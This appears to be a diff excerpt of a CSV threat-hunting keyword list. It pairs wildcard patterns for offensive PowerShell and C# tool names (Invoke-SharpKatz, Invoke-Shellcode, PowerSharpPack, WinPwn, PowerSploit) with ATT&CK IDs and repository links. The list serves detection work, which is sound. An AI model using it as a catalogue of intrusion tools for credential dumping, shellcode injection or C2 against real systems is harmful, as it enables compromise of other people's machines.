PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-SharpAllowedToAct*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpBlock*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpBypassUAC*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpChromium*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpClipboard*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpCloud*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpCloud*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Sharpcradle*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpDPAPI*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" 
+"*Invoke-SharPersist*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpGPO*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpGPOAbuse*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpGPO-RemoteAccessPolicies*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpHandler*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpHide*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 
- T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*InvokeSharpHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*Invoke-Sharphound*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Sharphound2*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharphound3*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpHound4*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" 
+"*Invoke-Sharphound4*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpImpersonation*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpImpersonation*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpImpersonationNoSpace*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpLdapRelayScan*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell 
for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpLdapRelayScan*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Sharplocker*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpLoginPrompt*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpMove*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpPrinter*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpPrinter*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpPrintNightmare*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpRDP*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-SharpRDP.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-SharpSCCM*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpSCCM*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SharpSecDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Sharpshares*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpSniper*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpSploit*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" 
-"*Invoke-Sharpsploit_nomimi*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpSpray*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpSSDP*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpStay*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpUp*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpUp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - 
TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-Sharpview*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpWatson*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Sharpweb*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Sharpweb*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpSCCM*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" 
+"*Invoke-SharpSCCM*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpSecDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharpshares*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpSniper*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpSploit*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharpsploit_nomimi*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - 
T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpSpray*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpSSDP*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpStay*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpUp*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpUp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Sharpview*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpWatson*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharpweb*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharpweb*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-SharpWeb.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-SharpWSUS*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpWSUS*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-Shellcode -Shellcode*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*Invoke-Shellcode*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Shellcode*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Shellcode*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" "*Invoke-Shellcode*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*Invoke-Shellcode.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
